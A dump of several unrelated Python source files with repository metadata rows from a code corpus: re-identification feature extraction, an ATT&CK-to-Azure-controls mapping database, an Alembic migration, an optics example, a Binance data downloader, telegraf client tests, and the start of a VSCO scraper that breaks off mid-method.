#_model = Baseline(num_classes, 1, '/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/_01_preprocessing_step/resnet50-19c8e357.pth', 'bnneck', 'after', 'resnet50', 'imagenet')
_model = Baseline(num_classes, cfg.MODEL.LAST_STRIDE, cfg.MODEL.PRETRAIN_PATH, cfg.MODEL.NECK, cfg.TEST.NECK_FEAT, cfg.MODEL.NAME, cfg.MODEL.PRETRAIN_CHOICE)
_model.load_param(checkpoint_path)
_model.eval()
return _model
def save_inferenced_features(cfg, save_feat_dir, checkpoint_path):
    os.makedirs(save_feat_dir, exist_ok=True)
    main_dir = cfg.DATASETS.ROOT_DIR
    # prepare the model
    model = load_trained_model(cfg, checkpoint_path)
    print("checkpoint was loaded successfully. Next, images are fed to the model one by one for feature extraction.")
    # Walk the dataset tree once with os.walk. The original nested loops
    # re-scanned every top-level folder for each directory entry, extracting
    # (and overwriting) the same .npy files many times over; this visits each
    # image exactly once, whatever the nesting depth.
    for root, _, files in os.walk(main_dir):
        for idx, file_name in enumerate(files):
            image = load_image(os.path.join(root, file_name))
            with torch.no_grad():
                features = model(image)
            feature_arry = features.numpy()
            out_file = os.path.join(save_feat_dir, "{}.npy".format(file_name))
            np.save(file=out_file, arr=feature_arry)
            print("feature extraction: \t{}/{} in {}".format(idx + 1, len(files), root))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="ReID Baseline Training")
parser.add_argument(
"--config_file", default="../configs/strong_baseline.yml", help="path to config file", type=str
)
parser.add_argument("opts", help="Modify config options using the command-line", default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
if args.config_file != "":
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
save_feat_dir_STB = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/tsne/strongbaseline_long_term_representations_20ids_testdata"
checkpoint_path_STB = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/strong_baseline/train_2021_Mar_08_12_31_22/resnet50_model_50.pth"
save_feat_dir_BSTF = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/tsne/BSTF_long_term_representations_20ids_testdata"
checkpoint_path_BSTF = "/media/socialab157/2cbae9f1-6394-4fa9-b963-5ef890eee044/A_PROJECTS/LOCAL/cvpr2021/YLD_YouLookDifferent/OUTPUT/Network2/paper_256to128_senet154/senet154_model_235.pth"
save_feat_dir = save_feat_dir_STB # change .yml file also
checkpoint_path = checkpoint_path_STB # change .yml file also
save_inferenced_features(cfg, save_feat_dir, checkpoint_path)
| 51.166667 | 211 | 0.627036 | 764 | 6,140 | 4.755236 | 0.242147 | 0.028076 | 0.038536 | 0.038536 | 0.543628 | 0.527938 | 0.46986 | 0.442334 | 0.442334 | 0.376824 | 0 | 0.040989 | 0.268893 | 6,140 | 119 | 212 | 51.596639 | 0.768323 | 0.043648 | 0 | 0.206522 | 0 | 0.043478 | 0.195808 | 0.119121 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032609 | false | 0 | 0.097826 | 0 | 0.152174 | 0.076087 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13e4428aa9e33af23d4e82833626b3992a31414 | 9,509 | py | Python | tools/db/database.py | Petes77/Azure-Security-Stack-Map | a02b9a178e3756680c9ec511159bf8f2d7ff50f3 | [
"Apache-2.0"
] | 154 | 2021-06-29T20:25:02.000Z | 2022-03-28T22:03:11.000Z | tools/db/database.py | Petes77/Azure-Security-Stack-Map | a02b9a178e3756680c9ec511159bf8f2d7ff50f3 | [
"Apache-2.0"
] | 20 | 2021-06-29T12:59:45.000Z | 2022-03-29T12:53:50.000Z | tools/db/database.py | Petes77/Azure-Security-Stack-Map | a02b9a178e3756680c9ec511159bf8f2d7ff50f3 | [
"Apache-2.0"
] | 22 | 2021-07-06T01:03:19.000Z | 2022-03-24T22:33:17.000Z | import yaml
from sqlalchemy import create_engine, func, and_, or_
from sqlalchemy.orm import sessionmaker
from db.model import Base, Tactic, Technique, SubTechnique, Mapping, Tag, \
MappingSubTechniqueScore, MappingTechniqueScore, Score, tactic_and_technique_xref
class MappingDatabase:
    """SQLite-backed store of ATT&CK (sub-)techniques, security-control mappings, and scores."""
def __init__(self, attack_ds, db_file):
self.attack_ds = attack_ds
self.engine = create_engine(f"sqlite:///{db_file}")
Base.metadata.create_all(self.engine)
Session = sessionmaker()
Session.configure(bind=self.engine)
self.session = Session()
def init_database(self, mapping_files, tags, skip_attack):
if skip_attack:
self.session.query(MappingTechniqueScore).delete()
self.session.query(MappingSubTechniqueScore).delete()
self.session.query(Score).delete()
self.session.query(Mapping).delete()
self.session.query(Tag).delete()
self.session.commit()
else:
Base.metadata.drop_all(self.engine)
Base.metadata.create_all(self.engine)
self.build_attack_database()
self.build_mapping_database(mapping_files, tags)
def query_mapping_files(self, tags, relationship, control_names, platforms):
if tags:
mapping_entities = self.session.query(Mapping).select_from(Mapping)\
.join(Mapping.tags).filter(Tag.name.in_(tags)).group_by(Mapping.mapping_id)
if relationship == "AND":
mapping_entities = mapping_entities.having(func.count(Tag.tag_id) == len(tags))
else:
mapping_entities = self.session.query(Mapping)
if control_names:
control_filters = []
for control in control_names:
control_filters.append(Mapping.name.like(f"%{control}%"))
mapping_entities = mapping_entities.filter(and_(or_(*control_filters)))
if platforms:
platform_filters = []
for platform in platforms:
platform_filters.append(Mapping.platform.like(f"%{platform}%"))
mapping_entities = mapping_entities.filter(and_(or_(*platform_filters)))
return mapping_entities
def get_sub_technique_ids(self, attack_ids):
ids = []
for attack_id in attack_ids:
if "." in attack_id:
ids.append(attack_id)
else:
ids.extend([value[0] for value in self.session.query(SubTechnique.attack_id).\
join(Technique).filter(Technique.attack_id == attack_id).all()])
return ids
def query_mapping_file_scores(self, categories, attack_ids, controls, level, platforms, scores, tactics, tags):
if level == "Technique":
sql = self.session.query(Mapping,Technique,Score).select_from(MappingTechniqueScore)\
.join(Mapping).join(Technique).join(Score).join(tactic_and_technique_xref).join(Tactic)\
.join(Mapping.tags, isouter=True)
else:
sql = self.session.query(Mapping,SubTechnique,Score).select_from(MappingSubTechniqueScore)\
.join(Mapping).join(SubTechnique).join(Score).join(Technique).join(tactic_and_technique_xref).join(Tactic)\
.join(Mapping.tags, isouter=True)
filters = []
if categories:
filters.append(Score.category.in_(categories))
if attack_ids:
if level == "Technique":
filters.append(Technique.attack_id.in_(attack_ids))
else:
attack_ids = self.get_sub_technique_ids(attack_ids)
filters.append(SubTechnique.attack_id.in_(attack_ids))
if controls:
control_filters = []
for control in controls:
control_filters.append(Mapping.name.like(f"%{control}%"))
filters.append(and_(or_(*control_filters)))
if platforms:
platform_filters = []
for platform in platforms:
platform_filters.append(Mapping.platform.like(f"%{platform}%"))
filters.append(or_(*platform_filters))
if scores:
filters.append(Score.value.in_(scores))
if tactics:
tactics_filters = []
for tactic in tactics:
tactics_filters.append(Tactic.name.like(f"%{tactic}%"))
filters.append(or_(*tactics_filters))
if tags:
tags_filters = []
for tag in tags:
if tag.startswith('"'):
tags_filters.append(Tag.name == tag.replace('"', ""))
else:
tags_filters.append(Tag.name.like(f"%{tag}%"))
filters.append(or_(*tags_filters))
sql = sql.filter(and_(*filters))
if level == "Technique":
return sql.order_by(Mapping.name.asc(), Technique.attack_id.asc())
else:
return sql.order_by(Mapping.name.asc(), SubTechnique.attack_id.asc())
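    # Editor-added usage sketch (not in the original file): a read-only score
    # query against an existing database. Passing None for attack_ds is an
    # assumption that holds as long as init_database() is never called.
    #   db = MappingDatabase(None, 'mappings.db')
    #   rows = db.query_mapping_file_scores(None, None, None, 'Technique',
    #                                       None, None, None, None)
    #   for mapping, technique, score in rows:
    #       print(mapping.name, technique.attack_id, score.value)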
def insert_score(self, score_yaml):
score = Score(category=score_yaml["category"], value=score_yaml["value"], comments=score_yaml.get("comments",""))
self.session.add(score)
return score
def insert_technique_score(self, mapping, technique, score):
mapping_score = MappingTechniqueScore(mapping=mapping,
technique=technique, score=score)
self.session.add(mapping_score)
def insert_sub_technique_score(self, mapping, sub_technique, score):
mapping_score = MappingSubTechniqueScore(mapping=mapping,
sub_technique=sub_technique, score=score)
self.session.add(mapping_score)
def build_mapping_database(self, mapping_files, tags):
all_tags = []
for platform in tags:
all_tags.extend(tags[platform])
all_tags = list(set(all_tags))
for tag in all_tags:
tag_entity = Tag()
tag_entity.name = tag
self.session.add(tag_entity)
self.session.flush()
for mapping_file in mapping_files:
with open(mapping_file, "r") as f:
mapping_yaml = yaml.safe_load(f)
mapping_entity = Mapping()
mapping_entity.name = mapping_yaml["name"]
mapping_entity.path = str(mapping_file)
mapping_entity.platform = mapping_yaml["platform"]
mapping_entity.description = mapping_yaml["description"]
self.session.add(mapping_entity)
yaml_tags = mapping_yaml.get("tags", [])
if yaml_tags:
tag_entities = self.session.query(Tag).filter(Tag.name.in_(yaml_tags)).all()
mapping_entity.tags.extend(tag_entities)
for technique_yaml in mapping_yaml.get("techniques", []):
technique = self.session.query(Technique).filter(Technique.attack_id == technique_yaml["id"]).first()
for score_yaml in technique_yaml["technique-scores"]:
score = self.insert_score(score_yaml)
self.insert_technique_score(mapping_entity, technique, score)
for sub_technique_score_yaml in technique_yaml.get("sub-techniques-scores", []):
for score_yaml in sub_technique_score_yaml["scores"]:
score = self.insert_score(score_yaml)
for sub_technique_yaml in sub_technique_score_yaml["sub-techniques"]:
sub_technique = self.session.query(SubTechnique).\
filter(SubTechnique.attack_id == sub_technique_yaml["id"]).first()
self.insert_sub_technique_score(mapping_entity, sub_technique, score)
self.session.commit()
def build_attack_database(self):
tactics = self.attack_ds.get_tactics()
for tactic_name, tactic_id in tactics.items():
tactic_entity = Tactic()
tactic_entity.name = tactic_name
tactic_entity.attack_id = tactic_id
self.session.add(tactic_entity)
techniques = self.attack_ds.get_tactic_techniques(tactic_name)
for technique in techniques:
technique_name = technique["name"]
attack_id = self.attack_ds.get_attack_id(technique)
technique_entity = self.session.query(Technique).filter_by(attack_id=attack_id).first()
if not technique_entity:
technique_entity = Technique()
technique_entity.name = technique_name
technique_entity.attack_id = self.attack_ds.get_attack_id(technique)
technique_entity.tactics.append(tactic_entity)
self.session.add(technique_entity)
else:
technique_entity.tactics.append(tactic_entity)
self.session.commit()
sub_ts = self.attack_ds.get_subtechniques()
for sub_tech in sub_ts:
attack_id = self.attack_ds.get_attack_id(sub_tech)
technique_id = attack_id.split('.')[0]
technique = self.session.query(Technique).filter_by(attack_id=technique_id).one()
sub_tech_entity = SubTechnique()
sub_tech_entity.name = sub_tech["name"]
sub_tech_entity.attack_id = attack_id
sub_tech_entity.technique = technique
self.session.add(sub_tech_entity)
self.session.commit() | 42.450893 | 123 | 0.617205 | 1,048 | 9,509 | 5.341603 | 0.109733 | 0.056985 | 0.042872 | 0.016077 | 0.296892 | 0.239014 | 0.18846 | 0.151483 | 0.100393 | 0.083244 | 0 | 0.000293 | 0.282469 | 9,509 | 224 | 124 | 42.450893 | 0.820167 | 0 | 0 | 0.214286 | 0 | 0 | 0.025657 | 0.002208 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054945 | false | 0 | 0.021978 | 0 | 0.10989 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13ea815378d2a8a1669b8154361a07477e30abf | 791 | py | Python | migrations/versions/e2cfee316e0a_.py | chrononyan/ok | 1c83e419dd8d5ef64c1e03a7f8a218e65a9fb7cf | [
"Apache-2.0"
] | 148 | 2018-07-03T02:08:30.000Z | 2022-03-26T04:03:35.000Z | migrations/versions/e2cfee316e0a_.py | chrononyan/ok | 1c83e419dd8d5ef64c1e03a7f8a218e65a9fb7cf | [
"Apache-2.0"
] | 856 | 2015-01-10T04:27:20.000Z | 2018-06-27T14:43:23.000Z | migrations/versions/e2cfee316e0a_.py | chrononyan/ok | 1c83e419dd8d5ef64c1e03a7f8a218e65a9fb7cf | [
"Apache-2.0"
] | 69 | 2015-01-26T08:06:55.000Z | 2018-06-25T12:46:03.000Z | """Add web submission changes
Revision ID: e2cfee316e0a
Revises: ed0359c3b84b
Create Date: 2016-08-08 16:41:43.369433
"""
# revision identifiers, used by Alembic.
revision = 'e2cfee316e0a'
down_revision = 'ed0359c3b84b'
from alembic import op
import sqlalchemy as sa
import server
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('assignment', sa.Column('upload_info', sa.Text(), nullable=True))
op.add_column('assignment', sa.Column('uploads_enabled', sa.Boolean(), nullable=False))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('assignment', 'uploads_enabled')
op.drop_column('assignment', 'upload_info')
### end Alembic commands ###
| 26.366667 | 91 | 0.710493 | 98 | 791 | 5.642857 | 0.510204 | 0.115732 | 0.075949 | 0.083183 | 0.260398 | 0.260398 | 0.159132 | 0.159132 | 0 | 0 | 0 | 0.06577 | 0.154235 | 791 | 29 | 92 | 27.275862 | 0.760837 | 0.384324 | 0 | 0 | 0 | 0 | 0.255507 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.272727 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13ec4b0d7f2db6046479acea69224b528393498 | 968 | py | Python | examples/matrix/PlanePair.py | will-hossack/Poptics | 4093876e158eb16421dfd4e57818210b11381429 | [
"MIT"
] | null | null | null | examples/matrix/PlanePair.py | will-hossack/Poptics | 4093876e158eb16421dfd4e57818210b11381429 | [
"MIT"
] | null | null | null | examples/matrix/PlanePair.py | will-hossack/Poptics | 4093876e158eb16421dfd4e57818210b11381429 | [
"MIT"
] | null | null | null | """
Example code to take a system of two thick singlet lenses the first on art 50 mm
and plot the focal length of as the second lens is moved from 60 to 100 mm.
"""
from poptics.matrix import ParaxialThickLens
from poptics.ray import RayPencil, RayPath
import matplotlib.pyplot as plt
def main():
lens = ParaxialThickLens(30,0.025,1.61,10.0,-0.035,5.0)
lens.setFocalLength(50) # Scale to 50 mm focal length
print(repr(lens))
mag = -0.3
obj,ima = lens.planePair(50,mag) # Make pair of planes
print("Object Plane : " + str(repr(obj)))
print("New Image Plane : " + str(repr(ima)))
# Make paraxial pencil from a point on object plane
pencil = RayPencil().addSourceParaxialBeam(lens,-0.5*obj.getHeight(), obj)
pencil.addMonitor(RayPath())
pencil *= lens
pencil *= ima
# Draw diagram
lens.draw(True)
obj.draw()
ima.draw()
pencil.draw()
plt.axis("equal")
plt.show()
main()
| 25.473684 | 80 | 0.655992 | 145 | 968 | 4.37931 | 0.537931 | 0.012598 | 0.037795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046791 | 0.227273 | 968 | 37 | 81 | 26.162162 | 0.802139 | 0.286157 | 0 | 0 | 0 | 0 | 0.055965 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.136364 | 0 | 0.181818 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d143003f63f0fd659540ddc8ab29e9880dd6fa30 | 3,310 | py | Python | Get_Symbol_Info.py | joao-aguilera-c/Binance-Algo-Trading-Bot | 859f971cf7b7f99c1c930157f22e44b801b8007c | [
"MIT"
] | 5 | 2021-09-17T15:48:08.000Z | 2022-03-13T22:56:30.000Z | Get_Symbol_Info.py | joao-aguilera-c/Binance-Algo-Trading-Bot | 859f971cf7b7f99c1c930157f22e44b801b8007c | [
"MIT"
] | null | null | null | Get_Symbol_Info.py | joao-aguilera-c/Binance-Algo-Trading-Bot | 859f971cf7b7f99c1c930157f22e44b801b8007c | [
"MIT"
] | 5 | 2021-09-17T02:07:41.000Z | 2022-02-09T09:15:36.000Z | import datetime
import os
import pandas as pd
from binance.client import Client
import main as ws
from strategies import strutcnow
def get_file_names(directory):  # 1. Get file names from directory
    file_list = os.listdir(directory)
    for index, item in enumerate(file_list):
        file_list[index] = item[:-4]  # strip the '.csv' extension
    return file_list
def TsToStrgCsvFormat(time):
t = datetime.datetime.utcfromtimestamp(time / 1000.0)
return t.strftime('%Y.%m.%d %H:%M:%S')
async def get_symbol_info(client, semanal_symbol_list, directory):
binance_client = client
# print("%s - Programa iniciado" % strutcnow())
# 2.To rename files
files = get_file_names(directory)
# print(files)
minutes_15 = pd.to_timedelta(15, unit='m')
days_60 = pd.to_timedelta(62, unit='D')
time_now = datetime.datetime.utcnow() - minutes_15
for week_symbols in semanal_symbol_list:
# print('%s - mining new values from %s' % (strutcnow(), s))
df = pd.read_csv('%s/%s.csv' % (directory, week_symbols), header=None)
last_rec_date = datetime.datetime.strptime(df[0].iloc[-1], '%Y.%m.%d %H:%M:%S') + minutes_15
# print('%s < %s' % (last_rec_date, time_now))
if last_rec_date < time_now:
"""print('%s - last mined candle was at: %s. Mining more.' % (strutcnow(),
datetime.datetime.strptime(
df[0].iloc[-1],
'%Y.%m.%d %H:%M:%S')))"""
candles_dataset = await binance_client.get_historical_klines(week_symbols,
Client.KLINE_INTERVAL_15MINUTE,
last_rec_date.strftime(
"%m/%d/%Y %H:%M:%S"),
time_now.strftime(
"%m/%d/%Y %H:%M:%S"))
            if candles_dataset:
df = pd.DataFrame(candles_dataset)
df = df.iloc[:, :-7]
df[0] = [TsToStrgCsvFormat(time) for time in df[0]]
if ws.get_last_csv_candle_time(directory, week_symbols) != df[0].iloc[-1]:
print('%s - %s -> update from: %s to time: %s' %
(strutcnow(),
week_symbols,
ws.get_last_csv_candle_time(directory, week_symbols),
df[0].iloc[-1]))
df.to_csv('%s/%s.csv' % (directory, week_symbols), mode='a', header=False, index=False)
else:
print("{} - Algo errado com o {}, binance não foi capaz de enviar dados.".format(
strutcnow(), week_symbols))
else:
            print('%s - %s already up to date' % (strutcnow(), week_symbols))
if __name__ == "__main__":
get_symbol_info(semanal_symbol_list=['BTCUSD', 'ETHUSD'], directory=r'/Symbols', client=None)
| 43.552632 | 108 | 0.475529 | 357 | 3,310 | 4.207283 | 0.319328 | 0.065912 | 0.009987 | 0.021305 | 0.201065 | 0.177097 | 0.173103 | 0.117177 | 0.117177 | 0.117177 | 0 | 0.016802 | 0.406647 | 3,310 | 75 | 109 | 44.133333 | 0.747963 | 0.064048 | 0 | 0.041667 | 0 | 0 | 0.090978 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.125 | 0 | 0.208333 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d143a02b68ba758261d56c1b88719e38bf7f10ac | 7,674 | py | Python | telegraf/tests.py | gdunstone/pytelegraf | 695a91af6e735c193200bdc4d99c0907c72fac85 | [
"MIT"
] | null | null | null | telegraf/tests.py | gdunstone/pytelegraf | 695a91af6e735c193200bdc4d99c0907c72fac85 | [
"MIT"
] | null | null | null | telegraf/tests.py | gdunstone/pytelegraf | 695a91af6e735c193200bdc4d99c0907c72fac85 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from telegraf.client import ClientBase, TelegrafClient, HttpClient
from telegraf.protocol import Line
from telegraf.utils import format_string, format_value
import unittest
import mock
class TestLine(unittest.TestCase):
def test_format_key(self):
self.assertEquals(format_string('foo'), 'foo')
self.assertEquals(format_string('foo,bar'), 'foo\,bar')
self.assertEquals(format_string('foo bar'), 'foo\ bar')
self.assertEquals(format_string('foo ,bar'), 'foo\ \,bar')
self.assertEquals(format_string('foo ,bar,baz=foobar'), 'foo\ \,bar\,baz\=foobar')
def test_format_value(self):
self.assertEquals(format_value('foo'), '"foo"')
self.assertEquals(format_value('foo bar'), '"foo bar"')
self.assertEquals(format_value('foo "and" bar'), '"foo \"and\" bar"')
self.assertEquals(format_value(123), "123i")
self.assertEquals(format_value(123.123), "123.123")
self.assertEquals(format_value(True), "t")
self.assertEquals(format_value(False), "f")
oversixtyfourk_str = u''.join([chr(32 + (i % 767)) for i in range(0, 300 + 2**16)])
self.assertLess(len(format_value(oversixtyfourk_str).encode('utf-8')), 2**16)
def test_single_value(self):
self.assertEquals(
Line('some_series', 1).to_line_protocol(),
'some_series value=1i'
)
def test_single_value_and_tags(self):
self.assertEquals(
Line('some_series', 1, {'foo': 'bar', 'foobar': 'baz'}).to_line_protocol(),
'some_series,foo=bar,foobar=baz value=1i'
)
def test_multiple_values(self):
self.assertEquals(
Line('some_series', {'value': 232.123, 'value2': 123}).to_line_protocol(),
'some_series value=232.123,value2=123i'
)
def test_multiple_values_and_tags(self):
self.assertEquals(
Line('some_series', {'value': 232.123, 'value2': 123}, {'foo': 'bar', 'foobar': 'baz'}).to_line_protocol(),
'some_series,foo=bar,foobar=baz value=232.123,value2=123i'
)
def test_tags_and_measurement_with_whitespace_and_comma(self):
self.assertEquals(
Line(
'white space',
{'value, comma': "foo"},
{'tag with, comma': 'hello, world'}
).to_line_protocol(),
"""white\ space,tag\ with\,\ comma=hello\,\ world value\,\ comma="foo\""""
)
def test_boolean_value(self):
self.assertEquals(
Line('some_series', True).to_line_protocol(),
'some_series value=t'
)
def test_value_escaped_and_quoted(self):
self.assertEquals(
Line('some_series', 'foo "bar"').to_line_protocol(),
'some_series value="foo \"bar\""'
)
def test_with_timestamp(self):
self.assertEquals(
Line('some_series', 1000, timestamp=1234134).to_line_protocol(),
'some_series value=1000i 1234134'
)
def test_tags_ordered_properly(self):
self.assertEquals(
Line('some_series', 1, {'a': 1, 'baa': 1, 'AAA': 1, 'aaa': 1}).to_line_protocol(),
'some_series,AAA=1,a=1,aaa=1,baa=1 value=1i'
)
def test_tags_filter_invalid_tags(self):
self.assertEquals(
Line('some_series', 1, {'a': 1, "invalid1": "", "invalid2": None, "_invalid3": "invalidvalue"}).to_line_protocol(),
'some_series,a=1 value=1i'
)
def test_values_ordered_properly(self):
self.assertEquals(
Line('some_series', {'a': 1, 'baa': 1, 'AAA': 1, 'aaa': 1}).to_line_protocol(),
'some_series AAA=1i,a=1i,aaa=1i,baa=1i'
)
class TestClientBase(unittest.TestCase):
def test_zero_value(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', 0)
self.client.send.assert_called_with('some_series value=0i')
def test_null_value(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', None)
self.assertEqual(self.client.send.call_count, 0)
def test_empty_values_dict(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', {})
self.assertEqual(self.client.send.call_count, 0)
def test_some_zero_values(self):
self.client = ClientBase()
self.client.send = mock.Mock()
self.client.metric('some_series', {'value_one': 1, 'value_zero': 0, 'value_none': None})
self.client.send.assert_called_with('some_series value_one=1i,value_zero=0i')
class TestTelegraf(unittest.TestCase):
def setUp(self):
self.host = 'host'
self.port = 1234
self.addr = (self.host, self.port)
def test_sending_to_socket(self):
self.client = TelegrafClient(self.host, self.port)
self.client.socket = mock.Mock()
self.client.metric('some_series', 1)
self.client.socket.sendto.assert_called_with(b'some_series value=1i\n', self.addr)
self.client.metric('cpu', {'value_int': 1}, {'host': 'server-01', 'region': 'us-west'})
self.client.socket.sendto.assert_called_with(b'cpu,host=server-01,region=us-west value_int=1i\n', self.addr)
def test_global_tags(self):
self.client = TelegrafClient(self.host, self.port, tags={'host': 'host-001'})
self.client.socket = mock.Mock()
self.client.metric('some_series', 1)
self.client.socket.sendto.assert_called_with(b'some_series,host=host-001 value=1i\n', self.addr)
self.client.metric('some_series', 1, tags={'host': 'override-host-tag'})
self.client.socket.sendto.assert_called_with(b'some_series,host=override-host-tag value=1i\n', self.addr)
def test_utf8_encoding(self):
self.client = TelegrafClient(self.host, self.port)
self.client.socket = mock.Mock()
self.client.metric(u'meäsurement', values={u'välue': 1, u'këy': u'valüe'}, tags={u'äpples': u'öranges'})
self.client.socket.sendto.assert_called_with(
b'me\xc3\xa4surement,\xc3\xa4pples=\xc3\xb6ranges k\xc3\xaby="val\xc3\xbce",v\xc3\xa4lue=1i\n', self.addr)
class TestTelegrafHttp(unittest.TestCase):
def setUp(self):
self.host = 'host'
self.port = 1234
self.url = 'http://{host}:{port}/write'.format(host=self.host, port=self.port)
def test_sending_to_http(self):
self.client = HttpClient(self.host, self.port)
self.client.future_session = mock.Mock()
self.client.metric('some_series', 1)
self.client.future_session.post.assert_called_with(url=self.url, data='some_series value=1i')
self.client.metric('cpu', {'value_int': 1}, {'host': 'server-01', 'region': 'us-west'})
self.client.future_session.post.assert_called_with(url=self.url,
data='cpu,host=server-01,region=us-west value_int=1i')
def test_global_tags(self):
self.client = HttpClient(self.host, self.port, tags={'host': 'host-001'})
self.client.future_session = mock.Mock()
self.client.metric('some_series', 1)
self.client.future_session.post.assert_called_with(data='some_series,host=host-001 value=1i', url=self.url)
self.client.metric('some_series', 1, tags={'host': 'override-host-tag'})
self.client.future_session.post.assert_called_with(data='some_series,host=override-host-tag value=1i',
url=self.url)
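if __name__ == '__main__':
    # Editor-added convenience so the file can be run directly; the original
    # suite presumably relied on an external test runner.
    unittest.main()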
| 40.819149 | 127 | 0.625228 | 999 | 7,674 | 4.622623 | 0.156156 | 0.095279 | 0.056301 | 0.057168 | 0.725206 | 0.663924 | 0.603075 | 0.555652 | 0.479212 | 0.444132 | 0 | 0.031967 | 0.221397 | 7,674 | 187 | 128 | 41.037433 | 0.740921 | 0.002737 | 0 | 0.297297 | 0 | 0.087838 | 0.20863 | 0.061758 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.162162 | false | 0 | 0.033784 | 0 | 0.222973 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1457af1ca58311f6c25338ec5321a3e6e4342ad | 13,396 | py | Python | vscope/vscope.py | baronvonbadguy/vscope | a0f94ac81728749387ee5f8074055a7708668189 | [
"MIT"
] | 2 | 2015-12-12T00:43:12.000Z | 2018-02-14T01:27:33.000Z | vscope/vscope.py | baronvonbadguy/vscope | a0f94ac81728749387ee5f8074055a7708668189 | [
"MIT"
] | null | null | null | vscope/vscope.py | baronvonbadguy/vscope | a0f94ac81728749387ee5f8074055a7708668189 | [
"MIT"
] | null | null | null | from collections import defaultdict, OrderedDict
from os import path as osp
from Queue import Queue
import re
import json
import os
import math
import argparse
import requests as rq
from requests.status_codes import codes
from bs4 import BeautifulSoup as bs
from tqdm import tqdm
from skimage import color
from skimage import io
from shared import ap, grab_logger, list_of_dicts_to_dict, dump_json, load_json
from threads import ThreadJSONWriter, ThreadMetadataRequest, ThreadCacheImageData
from analyzer import Analyzer
log = grab_logger()
class Image:
top_level_attributes = (
'upload_date',
'is_featured',
'height',
'width',
'description',
'tags',
'permalink',
'responsive_url',
'_id',
'is_video',
'grid_name',
'perma_subdomain',
'site_id'
)
supplementary_attributes_to_flatten = {
'iso': ('image_meta', 'ios'),
'model': ('image_meta', 'model'),
'make': ('image_meta', 'make'),
'preset': ('preset', 'short_name'),
'preset_bg_color': ('preset', 'color')
}
def __init__(self,
details,
session,
cached_image_width=None,
):
self._raw_details = details
tvp = self.top_level_attributes
self.details = {k: details.get(k, None) for k in tvp}
self.details.update(self._flatten_supplementary_attributes())
self.details['camera'] = '{} {}'.format(
self.details['make'],
self.details['model']
)
for param, value in self.details.iteritems():
self.__dict__[param] = value
self._add_param(param, value)
self._enforce_directories()
self.cached_image_width = cached_image_width \
if cached_image_width else self.width
self.session = self.s = session
self.link = 'http://{}?w={}'.format(
self.responsive_url, self.cached_image_width
)
self.local_filename = 'images/{}/{}-{}.jpg'.format(
self.perma_subdomain, self._id, self.cached_image_width
)
def __repr__(self):
return json.dumps(self.details)
def _add_param(self, name, value):
self.details[name] = value
def _flatten_supplementary_attributes(self):
flattened = {}
a = self.supplementary_attributes_to_flatten
for name, (first_lvl_key, second_lvl_key) in a.iteritems():
if first_lvl_key in self._raw_details:
first_level_dict = self._raw_details[first_lvl_key]
if second_lvl_key in first_level_dict:
